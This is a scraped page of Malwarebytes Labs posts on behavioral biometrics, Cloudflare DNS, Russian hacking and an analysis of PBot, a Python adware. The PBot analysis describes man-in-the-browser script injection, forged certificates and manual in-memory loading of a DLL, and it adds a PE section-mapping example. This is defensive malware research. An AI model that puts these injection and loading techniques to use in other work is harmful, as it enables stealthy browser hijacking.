The post New Crossrider variant installs configuration profiles on Macs appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Securing financial data of the future: behavioral biometrics explained

Malwarebytes - Tue, 04/24/2018 - 15:00

Some of us would be pretty excited about a brave, new passwordless world. Gone would be the days of having to write down 27 passwords and post them beside monitor screens. Or having to yell them out loud to a colleague on the other side of the room.

For banks and other financial institutions, a world without passwords may not be the be-all and end-all scenario they had in mind. They have realized that passwords, even with the aid of two-factor authentication, don’t do enough to protect sensitive client information from today’s digital threats.

As a result, they have been on the lookout for innovative ways to efficiently secure customer accounts. It didn’t take long for them to start considering biometrics—the measurement and analysis of a person’s unique characteristics.

While a range of banks have already adopted some biometric modalities, recently more and more financial institutions are beginning to take notice of behavioral biometrics due to its:

  • Flexibility. It can be tailored to an organization’s specific needs.
  • Convenience. It requires no specialized hardware, and doesn’t negatively impact user experience.
  • Efficiency. It functions in real-time and can be used alongside other modes of authentication.
  • Security. It’s inherently difficult to replicate or steal.

Let’s get to know this promising biometric modality even more, shall we?

What is behavioral biometrics?

Also known as behaviometrics or behavior-based authentication, this is a dynamic form of authentication that looks into a person’s behavioral patterns—the way they interact with systems and technologies—to identify users.

In the financial sector, this is used to continuously ensure that the person in a transaction with an online bank, an eCommerce site, a payment app, or a multi-factor authentication service is who they claim to be from the time they log in to the time they log out.

With this mode, users don’t need to memorize more passwords or download and save a set of backup codes to fall back on should something go wrong with their password. Because behavioral biometrics is generally passive, meaning users won’t even realize it is there, they can carry out their financial transactions continuously and securely without taking any additional action.

Outside the financial sector, behavioral biometrics can be applied to any modern computing device that interacts with a system, letting the user work without interruption while potentially sensitive data is protected in real time. Here is a scenario of how this might look in practice:

Sarah sends $25 to her flatmate, Cindy, via a popular P2P payment app as contribution to this weekend’s grocery run. They have planned on having a 90’s horror movie marathon, and she invited her cousin, Robin, to tag along. While Sarah and Cindy are preparing meals in the kitchen, Robin is left in the living room to pick out the films.

Robin notices that Sarah has left her phone on the couch, unlocked. After glancing at the kitchen entryway, she grabs the phone and opens her cousin’s P2P app, intending to send money to her own account because her mom didn’t have much in her wallet when she checked it this morning. Robin has planned a night out with friends tomorrow, and if Sarah notices the transfer, she’s confident her cousin will understand.

After Robin confirms the transfer in the app, a message pops up on the screen saying she isn’t authorized to do that. The biometric software built into the payment app has recognized that Robin’s behavioral pattern doesn’t match Sarah’s unique profile.

Shut the front door! Can it really be that accurate?

Terrifically and terrifyingly so, which is great for consumers and financial institutions. The scenario above is hypothetical and may not be as convincing, so here’s a real one: From 2012–2013, a European bank implemented a behavioral biometric scheme to their online banking service. Behavior data were collected from a limited number of clients per session for several months.

A session began when a customer logged in to the online banking portal and ended when the customer logged out. The transactions they completed while logged in could range from using a one-time password to regular banking transactions like checking accounts or transferring money.

As behavioral biometrics worked behind the scenes, clients went about their business generally with little to no disruption from the biometric scheme. After the trial run, they assessed the accuracy of the data and determined that the clients during those sessions were recognized as the correct users 99.7% of the time.

This means that if User A logs into an online bank with a behavioral biometric implementation, the system can validate that, based on their behavior patterns, the user logged in is still User A from beginning to end of a session.

And a 99.7% accuracy is said to be significantly high compared to that of other biometric modalities.

This almost sounds too good to be true. How does it work?

The key to the accuracy of behavioral biometrics is machine learning: computer systems that learn from data and improve without being explicitly programmed for each case. A user’s behavioral patterns, such as the way they hold their smartphone, move their mouse, or swipe a finger across a tablet screen, are measured and recorded by sensors (on a smartphone, for example, the accelerometer and gyroscope).

Advanced software algorithms then analyze all collected data to create a profile for the user. This profile is then used to continuously check against a user who is in an online banking session, as we have seen in the above case study. And that user could either be the true user, an imposter, or a bot.

The true user will almost always match their profile, while an imposter will find it very difficult to mimic the victim’s behavior. Bots generally fail to show measurable human responses at all, and don’t react to the random passive behavioral tests injected into a session, which makes them the easiest to spot.

As of this writing, behavioral biometrics is used for continuous authentication, risk-based authentication, insider threat detection, and fraud detection and prevention.

Wait. Isn’t it a privacy violation when a product starts collecting users’ patterns of behavior?

When it comes to biometrics, privacy is a huge concern, and this particular modality isn’t immune to it.

Unlike traditional forms of biometrics, which gather and store a person’s physiological characteristics such as a fingerprint or iris scan, behavioral biometrics collects data that on its own does not reveal who the person is. A fingerprint can identify someone; the way they move their mouse pointer or hold their smartphone cannot, it can only confirm that the same person is back. Behavioral biometrics also doesn’t need to know who you are, where you live, which bank holds your savings, or what your account credentials are in order to be sure that you are the same user who logged on last time.

According to the International Biometrics + Identity Association (IBIA), the kind of data collected by behavioral biometric applications is data that device and network operators already receive under standard privacy laws. Even though behavior data can be classed as non-personally identifiable information, the FTC, state governments, and the US Congress are considering regulating and restricting its collection and sharing.

This is mainly due to the practice of behavior monitoring and targeting for the purposes of online advertising, not for the purpose of authentication or as an added security layer. The Electronic Frontier Foundation (EFF) published a legislative primer about concerns and solutions for this kind of behavior monitoring that you can read here.

What providers of this modality can do is to educate their users about the security benefits of behavior-based authentication, to be transparent about how the data being collected is used, and give users the option to revoke the usage license of their biometric data. IBIA has already asserted that behavioral biometrics providers are looking for novel approaches to addressing privacy concerns.

Are there any disadvantages to behavioral biometrics?

Regardless of how unreal behavioral biometrics may sound, this modality, like the others, isn’t perfect. Voice or speaker recognition, signature analysis, and keystroke dynamics are all methods of behavioral biometrics, and each has weaknesses. Sometimes they even pose additional security risks.

For example, voice authentication can be circumvented by obtaining a high-quality recording of the target’s voice to be played back in the future. Background noise is also an issue when it comes to registering one’s voice for authentication. Keystroke analysis and signature recognition have low accuracy rates and can readily be affected by the user’s physical and emotional disposition, respectively.

Note that the behavioral biometric schemes employed by current providers for financial systems do not use the above modalities. As of this writing, there is no published literature on the disadvantages of AI-driven behavioral biometrics.

What happens if a user changes the way they interact with their device?

We mentioned earlier that behavioral biometrics is a dynamic form of authentication. By this we mean that it doesn’t just accept and remember a single biometric sample, such as a fingerprint. Instead, it records the many ways users perform an action, along with other notable characteristics. All of these (and possibly more) are analyzed and used to build a profile of a single user.

Changes in a person’s behavior happen naturally, often without the person realizing it, and this is accounted for when measuring behavior. Let’s also not forget that behavioral biometrics coupled with machine learning continuously checks a user’s identity throughout a session. A slight difference in behavior won’t lock someone out of their account.
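To make the mechanism described under “How does it work?” and the drift handling described just above concrete, here is a toy continuous-authentication scorer. It is an added example, not code from the original post or from any behavioral biometrics vendor: a simple statistical profile (running mean and variance per feature) stands in for the machine-learning models providers use. The feature names, the numbers behind Sarah’s and Robin’s constructed sessions, the anomaly threshold and the window size are all assumptions chosen for illustration.

```python
"""Toy continuous-authentication scorer for behavioral biometrics.

Added example, not code from the original post or from any vendor: a simple
statistical stand-in for the machine-learning models providers use. The
feature names, the numbers behind the constructed sessions and the thresholds
are assumptions chosen for illustration.
"""
import math
import random
from dataclasses import dataclass, field

# Per-event features a banking app could sample (assumed for this example):
# key hold time, time between keys, swipe speed and how the phone is tilted.
FEATURES = ("hold_ms", "flight_ms", "swipe_px_per_ms", "tilt_deg")


@dataclass
class Profile:
    """Running mean and variance per feature (Welford's method), so the profile
    keeps learning from accepted events and follows gradual behavior drift."""
    n: int = 0
    mean: list = field(default_factory=lambda: [0.0] * len(FEATURES))
    m2: list = field(default_factory=lambda: [0.0] * len(FEATURES))

    def update(self, event):
        self.n += 1
        for i, x in enumerate(event):
            delta = x - self.mean[i]
            self.mean[i] += delta / self.n
            self.m2[i] += delta * (x - self.mean[i])

    def std(self, i):
        if self.n < 2:
            return float("inf")
        return math.sqrt(self.m2[i] / (self.n - 1)) or 1e-9

    def anomaly(self, event):
        """Mean absolute z-score across features: about 0.8 for the enrolled
        user, several times that for someone else holding the phone."""
        return sum(abs(x - self.mean[i]) / self.std(i)
                   for i, x in enumerate(event)) / len(FEATURES)


def build_profile(sessions):
    """Enrol a user from several recorded sessions (lists of feature tuples)."""
    profile = Profile()
    for session in sessions:
        for event in session:
            profile.update(event)
    return profile


def check_session(profile, events, threshold=2.5, window=5, adapt=True):
    """Score every event as it arrives, as the app would during a session.
    Returns (verdict, event_index): 'ok' at the end of the session, or
    'imposter' / 'bot' at the first window where the check fails."""
    recent = []
    for idx, event in enumerate(events):
        recent.append(event)
        if len(recent) > window:
            recent.pop(0)
        if len(recent) < window:
            continue
        # Bots and replays: real hands jitter, so identical hold times across
        # a whole window are not a human response.
        holds = [e[0] for e in recent]
        if max(holds) - min(holds) < 0.05 * profile.std(0):
            return "bot", idx
        # Imposters: the rolling anomaly score sits far from the profile.
        if sum(profile.anomaly(e) for e in recent) / window > threshold:
            return "imposter", idx
        if adapt:  # accepted events refine the profile, absorbing slow drift
            profile.update(event)
    return "ok", len(events)


def synth_session(rng, centre, spread, n):
    """Constructed sample data: n events drawn around one person's centre."""
    return [tuple(rng.gauss(c, s) for c, s in zip(centre, spread)) for _ in range(n)]


# Assumed behavior of the two people in the scenario (centre, spread per feature).
SARAH = ((95.0, 140.0, 1.2, 22.0), (6.0, 15.0, 0.15, 3.0))
ROBIN = ((70.0, 95.0, 2.0, 35.0), (5.0, 12.0, 0.2, 3.0))


def demo(seed=7):
    rng = random.Random(seed)
    profile = build_profile([synth_session(rng, *SARAH, 60) for _ in range(5)])
    # Sarah a month later: every feature has drifted by one standard deviation.
    drifted_centre = tuple(c + s for c, s in zip(*SARAH))
    return {
        "sarah": check_session(profile, synth_session(rng, *SARAH, 40))[0],
        "sarah_drifted": check_session(profile, synth_session(rng, drifted_centre, SARAH[1], 40))[0],
        "robin": check_session(profile, synth_session(rng, *ROBIN, 40))[0],
        "replay_bot": check_session(profile, [tuple(profile.mean)] * 10)[0],
    }


if __name__ == "__main__":
    print(demo())
```

The verdict comes from a rolling window rather than from a single event, which is what lets a genuine user have an odd keystroke or two without being locked out, while an imposter, whose every event is off, trips the threshold within the first window.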

What other threats do behavioral biometrics claim to address?

In the financial sector, behavioral biometrics can provide protection against account-sharing fraud, account takeover attacks, new account fraud, malware, and some RATs. One provider even claims it can help protect against ransomware.

Behavioral biometrics can also be used to nip incidences of insider threats in the bud.

Not yet ready to replace passwords

Behavioral biometrics in the financial sector is relatively new and continues to improve and mature. At this point in time, it doesn’t claim to replace passwords or two-factor authentication. It is, however, another supplement to the bigger picture: a layered security approach to protecting sensitive user data. So as much as we’d like to reach that ultimate dream of an utterly passwordless society—and this is entirely possible in our lifetime—we may have to wait a little bit longer. After all, the groundwork is prepped, and we’re seeing organizations beginning to build on it.

Behavior-based authentication can potentially change a lot of things, and we can expect a new trend emerging in user verification soon. And with it comes possibly new and interesting challenges for the cybersecurity industry to tackle.

The post Securing financial data of the future: behavioral biometrics explained appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (April 16 – April 22)

Malwarebytes - Mon, 04/23/2018 - 16:06

Last week, we took a stroll down memory lane talking about Facebook and MySpace, noticed a change in the Magnitude exploit kit—wherein it started adopting the GandCrab ransomware, took a good look at a new form of adware that is based on Python, chatted a bit about Russian hacking with a journalist, encouraged retailers to ask the right questions to protect their business, and weighed in on a way to speed up Internet bandwidth and increase privacy via Cloudflare’s new DNS service.

Other news
  • Cryptocurrency is all the rage these days—and so are cryptominers. Security researchers recently discovered one that doesn’t rely on an open browser session. (Source: HackRead)
  • Tax fraud is no longer for the clueless, it seems. Experts noticed that scammers are also targeting tax professionals—those filing taxes on behalf of their clients. (Source: CNBC)
  • To date, adware, spyware, and malware have lurked inside the Google Play Store. But surveillanceware? That’s definitely something new. (Source: Lookout Blog)
  • At the recently concluded RSA conference, tech companies like Microsoft and Facebook joined together to sign a pledge to protect users and refrain from helping any government launch a cyberattack. (Source: ZDNet)
  • While the usage of Adobe Flash has significantly decreased, this doesn’t mean that the threats exploiting them have declined. So remain vigilant! (Source: McAfee’s Securing Tomorrow Blog)
  • Gmail’s new “Confidential Mode” is not entirely private after all. SIGH. (Source: Sophos’s Naked Security Blog)
  • Security researchers noticed an increased activity of APT groups based in Asia and the Middle East. (Source: SC Magazine)
  • Here’s a new word to keep in mind: trustjacking. And iPhone users are particularly at risk of this one. (Source: Wired)
  • Stresspaint, a new information stealer, is a type of malware that is after Chrome login data, session cookies, and appears to be particularly interested in Facebook details. (Source: Bleeping Computer)
  • A ransomware variant appeared to be repurposed to infect files, mine for cryptocurrency…and destroy affected users’ files. Good grief! (Source: ZDNet)

Stay safe, everyone!

The post A week in security (April 16 – April 22) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cloudflare’s new DNS service

Malwarebytes - Fri, 04/20/2018 - 16:00

Are you looking for a free way to speed up your internet and gain some extra privacy in the process? Keep reading, because Cloudflare (the Web Performance & Security Company) is offering a free new DNS service. And it helped me improve the speed of my DNS lookups.

What is DNS?

DNS is short for Domain Name System. It is the internet protocol that lets your system refer to a web server by a domain name rather than by the server’s actual IP address. For example, the IP address for is, but rather than typing that into your browser, you just type ‘,’ and your system asks a ‘DNS server,’ which looks up the domain name and returns the corresponding IP address. Unfortunately, if a popular DNS server is taken down or otherwise disrupted, many users can no longer reach their favorite websites, because without the web server’s IP address your system cannot find the site. When explaining DNS name resolution, I think that finding a phone number for a certain person is a good analogy. There are several ways to find a person’s phone number, and the same is true for resolving the IP address that belongs to a domain name.

Which DNS servers am I using now?

If you have to ask yourself that question, there’s a big chance that you are using the DNS service provided by your internet provider. And while some of those are quite good, others are deplorable. Those that have looked into changing their DNS servers have probably ended up using Google’s public DNS, or if they were also interested in a web filter, they might have ended up using Cisco’s OpenDNS. IMHO those are the two most popular alternatives for the ones provided by ISPs around the globe, but many more are available.

Why would I change to Cloudflare’s?

We are not saying you should, but their claims sound very promising. Even if the differences in speed and privacy are not directly noticeable, you may be convinced by these arguments:

  • Cloudflare claims its resolver is several times faster than the average ISP’s (about 8 milliseconds per lookup compared to 70).
  • Most ISP resolvers only accept queries over plain, unencrypted DNS and do not validate DNSSEC, so anyone on the network path can read or tamper with your lookups (a man-in-the-middle attack). Cloudflare’s resolver validates DNSSEC and also accepts queries over encrypted transports (DNS over TLS and DNS over HTTPS).
  • Many companies collect data from their DNS customers to use for commercial purposes. Cloudflare promises not to mine any user data. Logs are kept for 24 hours for debugging purposes, then they are purged.
  • Query name minimization diminishes privacy leakage by only sending minimal query names to authoritative DNS servers.

That last one may need some explanation. The less information DNS servers send each other to resolve your query, the less data would be revealed in the event of a leak or breach. A resolver that uses query name minimization therefore sends each authoritative server only the part of the name that server needs to answer: the root servers are asked only about the top-level domain, the top-level domain’s servers only about the next label, and so on, so only the final server sees the full name you looked up.
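The following toy resolver shows the difference in what each server learns. It is an added example, not code from the original post or from Cloudflare: it walks a constructed delegation tree (root, then `com.`, then `example.com.`) once sending the full name to every server, the classic behaviour, and once sending only as much of the name as each server needs, the behaviour of query name minimization (RFC 7816). The zones, name server names and the `192.0.2.1` address are constructed for the example.

```python
"""Query name minimization, illustrated on a constructed delegation tree.

Added example, not code from the original post or from Cloudflare: a toy
resolver that walks root -> TLD -> zone the way a real one does, once sending
the full name to every server (classic) and once sending only as much of the
name as each server needs (RFC 7816 qname minimization). The zones, name
servers and the 192.0.2.1 address are constructed for this example.
"""

# Each zone's servers know only their own delegations (NS) and records (A).
ZONES = {
    ".":            {"com.": ("NS", "a.gtld-servers.example.")},
    "com.":         {"example.com.": ("NS", "ns1.example.com.")},
    "example.com.": {"www.example.com.": ("A", "192.0.2.1")},
}


def labels(name):
    return [l for l in name.rstrip(".").split(".") if l]


def enclosing(qname):
    """Names that contain qname, longest first: www.example.com. -> example.com., com."""
    parts = labels(qname)
    return [".".join(parts[i:]) + "." for i in range(1, len(parts))]


def ask(zone, qname):
    """What an authoritative server for `zone` answers for `qname`:
    an exact record, a referral to the closest delegation, or NXDOMAIN."""
    data = ZONES[zone]
    if qname in data:
        rtype, value = data[qname]
        return (rtype, qname if rtype == "NS" else value)
    for cut in enclosing(qname):
        if cut in data and data[cut][0] == "NS":
            return ("NS", cut)          # referral: go ask the child zone
    return ("NXDOMAIN", None)


def next_qname(zone, target):
    """One more label than the zone being asked (query name minimization)."""
    want = len(labels(zone)) + 1
    return ".".join(labels(target)[-want:]) + "."


def resolve(target, minimize):
    """Return (address, queries); queries lists (zone asked, qname sent)."""
    zone, queries = ".", []
    while True:
        qname = next_qname(zone, target) if minimize else target
        queries.append((zone, qname))
        rtype, value = ask(zone, qname)
        if rtype == "A":
            return value, queries
        if rtype == "NS":
            zone = value                # follow the delegation downwards
            continue
        raise LookupError(f"{qname} not found at {zone}")


def labels_seen(queries):
    """How many labels of the target each server learned."""
    return {zone: len(labels(qname)) for zone, qname in queries}


if __name__ == "__main__":
    for minimize in (False, True):
        ip, qs = resolve("www.example.com.", minimize)
        print("minimized" if minimize else "classic  ", ip, labels_seen(qs))
```

Both walks end at the same address; the difference is that with minimization the root servers only ever see `com.` and the `com.` servers only `example.com.`, so a breach or log leak at either of them exposes nothing about which host you were looking for.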

How to change your DNS servers?

The method to change your DNS servers depends very much on the level at which you want to change them and on the operating system you are using. If you have tried the DNS service and decide that you like it, it might be advisable to change the DNS servers at the router level, so you don’t have to do it for each device separately. To do this successfully your computers and devices need to be set up for DHCP, or they will not even look at the router for DNS information. Lifewire published a guide for the most common routers that might prove to be handy. For mobile devices be aware that they will change DNS servers when they are no longer using your router.

At the device level, the OS is the deciding factor on how you can change the DNS servers.

Testing the difference

To check whether switching DNS service would give you a speed improvement, you can use a free tool called NameBench.

Background information: the NameBench tool is offered by Google and was launched around the same time that Google started offering their free DNS service.

NameBench can be downloaded from Google Code – there are suitable versions for several operating systems –  and after installation, you can specify the DNS servers that you would like it to test.

  • Google Public DNS:
  • Cloudflare DNS:
  • OpenDNS :

It does help to set “Your location,” but my laptop travels a lot, so I skipped that. Then click “Start Benchmark” and be patient, because it may take a few minutes before the application is done testing (it took almost half an hour on my laptop). The results will have a layout similar to this one:

While your results may be very different from mine, you can tell that it can definitely pay off to do this test if you are looking for a speed improvement.

So, a speed improvement of 13.5% and a promise of added privacy. What am I going to do? Well, at least I’ll try it for a while to see if it makes a real difference. And note that I was already using an alternative to my provider’s DNS service, which was terrible to begin with.


For most internet users it is worth looking into which DNS service works best for them, be it for a speed improvement or for some of the added benefits that certain DNS services offer, like additional privacy or parental controls. But most will keep using the servers provided by their ISP because they can’t be bothered or find it too complicated to change the settings. We do our best to encourage our readers to make informed choices and decide for themselves who they want to trust with the data that can be derived from their DNS lookups.

Be safe!

The post Cloudflare’s new DNS service appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Perspectives on Russian hacking

Malwarebytes - Thu, 04/19/2018 - 16:42

Russia is an endlessly fascinating subject both in and around infosec. Recent years have shifted attention away from pure malware capabilities, to psyops, social engineering, and an endless slew of mind games designed to destabilize and keep nations ever-so-slightly off balance.

Security firms in some countries claim Russia would “win” in a so-called cyber war; elsewhere, whole nations seemingly throw up their hands and admit defeat, while…helpfully?…suggesting potential targets of interest. One hopes those are false flags diverting attention from the juicier strike points, but when even the Russian experts themselves seem to slip up in spectacular fashion, it seems anything is possible.

In fact, the US and UK have just released a joint statement which highlights Russian hacking (state-sponsored attacks) on network infrastructure devices over the last three years. With hack attacks bubbling under the surface, and endless concerns present about everything from referendum tampering to election interference, the subject has never been more prominent.

SCMagazine recently talked to a number of people working in security fields, myself included, on this very subject. While many areas of concern were raised, the main takeaways are as follows:

Bots and social media

The social media landscape has been irrevocably changed, in terms of what a nation state can potentially achieve with a troll/bot farm. “You’re a Russian bot” on Twitter has almost become the de facto explanation for anyone you might happen to disagree with. Indeed, Russian shenanigans on said platform are so prolific that Twitter had to start sending out “So you dealt with a bot” style messages in January.

How many? Roughly 1.4 million notifications for anyone found to have interacted with the IRA (Internet Research Agency) during the 2016 US election. This includes:

  • People who directly engaged during the election period with the 3,814 IRA-linked accounts that were identified, either by retweeting, quoting, replying to, mentioning, or liking those accounts or content created by those accounts
  • People who were actively following one of the identified IRA-linked accounts at the time those accounts were suspended
  • People who opt out of receiving most email updates from Twitter and would not have received our initial notice based on their email settings.

I never received a message myself, so either my Opsec game is on point or I spend too much time tweeting about chocolate.

There is an ongoing investigation into how many Russian bots dabbled in the UK’s EU referendum, also from the same year. Social media is an amazingly powerful platform for disinformation, and more often than not corrections either never take place or gain far fewer eyeballs than the original mistruth.

Who, what, when…you know what, just stop the attack

With the rise of APT attacks (“advanced persistent threats”), there has been huge focus on which nation state is doing what terrible and sneaky thing online. This is the case even when APTs typically turn out to be not very advanced at all—infected spreadsheet or basic phishing email, anyone?

All the same, being able to track down an attack and trace it back to country x is a huge headline grabber. The problem is that in many cases, the best you can do is make an informed guess.

Pin the tail on the nation state donkey was a big deal at one time; the focus is now slowly shifting to something people can actually do something about. Namely, not so much “who did this” but “how did they get in, and how can we stop it happening next time?” There’s no shame in being bested by an actual government with unlimited resources, and it’s definitely time to consider how we can make ourselves as unappealing a target as possible.

Holding you to ransom

Ransomware is one of the mainstays of Russian malware development, with numerous high profile attacks over the last few years. It’s interesting to wonder if the downturn in ransomware fortunes over the past year has had an impact on said development. It’s also interesting to wonder how much Russia may be contributing to the upturn in business-centric spyware recently.

Information may want to be free, but a little data exfiltration never hurt anybody (from a nation state’s perspective doing the exfiltration, at any rate). It’s a double whammy of locked up machines and harvested sensitive documents, and it’s all to play for.

Money makes the computer world go round

Governments around the world are now throwing big bucks at these issues. The UK previously dedicated £1.9 billion over five years to tackling the problem, and recently jumped into the world’s largest “cyber declaration”, a pact between up to 53 nations designed to help shore up defences globally. Expect to see tight bonds forged moving forward.

Whatever your approach, whatever your budget, whatever your defensive tactics, there’s never been a better time to consider if you’re doing all you can to try and dodge a digital attack from the highest level. Meanwhile, whether through organised malware attacks, high level subterfuge, or a relentless wave of social media botting, the digital monolith that is Russia continues to dance to nobody’s tune but its own.

The post Perspectives on Russian hacking appeared first on Malwarebytes Labs.


PBot: a Python-based adware

Malwarebytes - Wed, 04/18/2018 - 15:00

Recently, we came across a Python-based sample dropped by an exploit kit. Although it arrives under the guise of a MinerBlocker, it has nothing in common with miners. In fact, it seems to be PBot/PythonBot: a Python-based adware.

Apart from a couple of posts on Russian-language forums and brief threat notes, we couldn’t find any detailed publication.

Some of its features are pretty interesting, so we decided to take a closer look. The malware performs MITB (man-in-the-browser) attacks and injects various scripts into legitimate websites. Its capabilities may go beyond simple injections of ads, depending on the intentions of its distributors.

Analyzed samples

Distribution method

The described sample was dropped by the RIG exploit kit:

Behavioral analysis

Installation

The main executable, dropped by the exploit kit, is a downloader. The downloader is pretty simple and not obfuscated. We can see the scripts in the resources:

Its role is to fetch the second installer that has all the malicious Python scripts inside. The second component is named MinerBlocker.

The interesting thing is, if the downloaded component is run as a standalone, it behaves like a normal, legitimate installer, displaying a EULA and installation wizard. We can see the following information:

It pretends to be a legitimate application dedicated to blocking malicious miners. However, we could not find any website corresponding to the mentioned product, so at the moment we suspect that it is fully made up.

When the same component is run by the original downloader, the installation is fully stealthy instead. It drops the package in %APPDATA%.


The dropped application consists of multiple elements. We can see a full installation of Python prepared in order to run the dropped scripts. The bundle also has its own uninstaller (uninstall.exe) that, once deployed, fully removes the package.

In the directory js, as the name suggests, we can find a file with JavaScript, i.js:

In configs, there are two configuration files: rules.ini and settings.ini.

The configuration file rules.ini specifies the path to the JavaScript and suggests that it will be injected somewhere:


The file settings.ini contains various interesting parameters. It contains, among others:

1) The ports on which the service will be running, and the issuer of the used certificate:

2) A list of processes (browsers) that will possibly be attacked:

3) A set of whitelisted IPs and domains. The domains are in Base64 format and, after decoding them, we can see various Russian banking sites. The full list of the decoded sites is available here. As we later confirmed, those sites are exempted from the infection.

Persistence is achieved by Run keys in the registry:

They lead to one of the scripts called “” Once this script is run, it deploys another Python component: “” with the dropped .ini files:


If we look at the packaging, which contains an uninstaller, the application could look legitimate. However, its functionality is far from something that any user would desire to have on his/her computer. First of all, it injects scripts into each website you visit. The injected script comes from the path specified in the configuration; however, it further loads a second stage from the remote server (captured content of the second stage available here).

So, once it is injected, the attackers are in control of the contents displayed in our browser. They can inject ads, but also any other much more malicious content.

Example of a site with the script injected by the malware that impersonates a domain belonging to Google:

Compare it with the script that was in the directory js, i.js (formatted version available here):

Also, the malware forges certificates and performs the man-in-the-browser attack. The legitimate certificates on the sites with HTTPS are replaced by fake certificates issued by “The Filter,” a malicious entity:

Looking at the sockets opened by a browser (e.g., with Process Explorer) and comparing them with the sockets opened by the Python instance, we find that they are paired together. This is an indicator that the browser communicates with the malware and works under its control.

Example: Internet Explorer connected to a socket 24681. We can see that this socket was opened by the Python process running the malware:

Inside

The loader (written in Python)

The first layer of the malware is the obfuscated Python scripts.

As mentioned before, at the beginning, the script is run. This script is obfuscated. Its role is to run the second Python layer that is

The script is supposed to decrypt a DLL stored in the file httpfilter.bin.

Then, it injects the DLL into the Python executable. For the purpose of injection, it uses imported system DLLs, ctypes, and custom definitions of the PE headers.

Fragment of the PE headers definitions:

It manually loads the PE file (remaps sections to virtual format, applies relocations and loads imports). Beginning of the loader:

After loading is complete, it redirects the execution to the entry point.

You can find the full deobfuscated loader here.

It is interesting because PE injectors written in Python are not so common.
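The first thing any manual PE loader of this kind has to do is walk the headers and copy each section from its file offset to its virtual address. The following is an added example written for this post, not PBot's loader and not code from the article: a pure-Python section-table parser that remaps a file image into its in-memory layout and translates between RVAs and file offsets, which is the same bookkeeping an analyst needs when comparing a dumped image with the file on disk. Relocations and import resolution, the next two steps the loader performs, are deliberately left out. The two-section PE32 it parses is constructed inline and is entirely hypothetical.

```python
"""Parse PE32 section headers and remap a file image into its virtual layout.
Added example for this post; not PBot's loader. The sample PE is constructed."""
import struct
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_pointer: int
    raw_size: int


@dataclass(frozen=True)
class PEInfo:
    entry_point: int
    size_of_image: int
    size_of_headers: int
    section_alignment: int
    file_alignment: int
    sections: List[Section]


def parse_pe(pe: bytes) -> PEInfo:
    """Walk DOS header -> NT headers -> section table (PE32 only)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    (n_sections,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    opt = e_lfanew + 24  # optional header follows the 20-byte file header
    (magic,) = struct.unpack_from("<H", pe, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    (entry,) = struct.unpack_from("<I", pe, opt + 16)
    sect_align, file_align = struct.unpack_from("<II", pe, opt + 32)
    size_of_image, size_of_headers = struct.unpack_from("<II", pe, opt + 56)
    table = opt + opt_size
    sections = []
    for i in range(n_sections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + i * 40)
        sections.append(Section(name.rstrip(b"\x00").decode("ascii"), va, vsize, raw_ptr, raw_size))
    return PEInfo(entry, size_of_image, size_of_headers, sect_align, file_align, sections)


def rva_to_offset(info: PEInfo, rva: int) -> int:
    """Translate an RVA (memory view) to a file offset (raw view)."""
    for s in info.sections:
        if s.virtual_address <= rva < s.virtual_address + max(s.virtual_size, s.raw_size):
            return rva - s.virtual_address + s.raw_pointer
    if rva < info.size_of_headers:
        return rva  # headers are mapped 1:1
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def offset_to_rva(info: PEInfo, offset: int) -> int:
    """Translate a file offset back to an RVA."""
    for s in info.sections:
        if s.raw_pointer <= offset < s.raw_pointer + s.raw_size:
            return offset - s.raw_pointer + s.virtual_address
    if offset < info.size_of_headers:
        return offset
    raise ValueError(f"offset {offset:#x} lies outside every section")


def map_image(pe: bytes) -> bytearray:
    """Lay the file out as a loader would: headers first, then each section at its RVA."""
    info = parse_pe(pe)
    image = bytearray(info.size_of_image)
    image[: info.size_of_headers] = pe[: info.size_of_headers]
    for s in info.sections:
        n = min(s.raw_size, info.size_of_image - s.virtual_address)
        image[s.virtual_address: s.virtual_address + n] = pe[s.raw_pointer: s.raw_pointer + n]
    return image


def build_sample_pe() -> bytes:
    """Constructed two-section PE32 (hypothetical; for demonstration only)."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x2102)
    opt = struct.pack(
        "<HBB" + "I" * 9 + "H" * 6 + "III",
        0x10B, 14, 0,              # magic, linker version
        0x200, 0x200, 0,           # SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData
        0x1000, 0x1000, 0x2000,    # AddressOfEntryPoint, BaseOfCode, BaseOfData
        0x400000, 0x1000, 0x200,   # ImageBase, SectionAlignment, FileAlignment
        4, 0, 0, 0, 4, 0,          # OS / image / subsystem versions
        0, 0x3000, 0x400,          # Win32VersionValue, SizeOfImage, SizeOfHeaders
    ).ljust(0xE0, b"\x00")
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x150, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    data = struct.pack("<8sIIIIIIHHI", b".data", 0x100, 0x2000, 0x200, 0x600, 0, 0, 0, 0, 0xC0000040)
    headers = (dos + b"PE\x00\x00" + file_hdr + opt + text + data).ljust(0x400, b"\x00")
    return headers + b"TEXT".ljust(0x200, b"\xCC") + b"DATA".ljust(0x200, b"\x00")
```

Note that after `map_image` the gap between the end of `.text` and the start of `.data` is zero-filled, exactly as a loader leaves it; this is why a memory dump is larger than, and laid out differently from, the file it came from.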

The injector (DLL)

The DLL injected in Python (e5ba5f821da68331b875671b4b946b56) is the main component of the malware. This component expects to be injected into Python executable:

It also fetches the passed parameters (settings.ini and rules.ini). So we can see that they were not meant to be parsed by the script to which they were previously passed.

The authors left some debug strings that make the execution flow easy to follow. For example:

This DLL is responsible for parsing the configuration and setting up the malicious proxy.

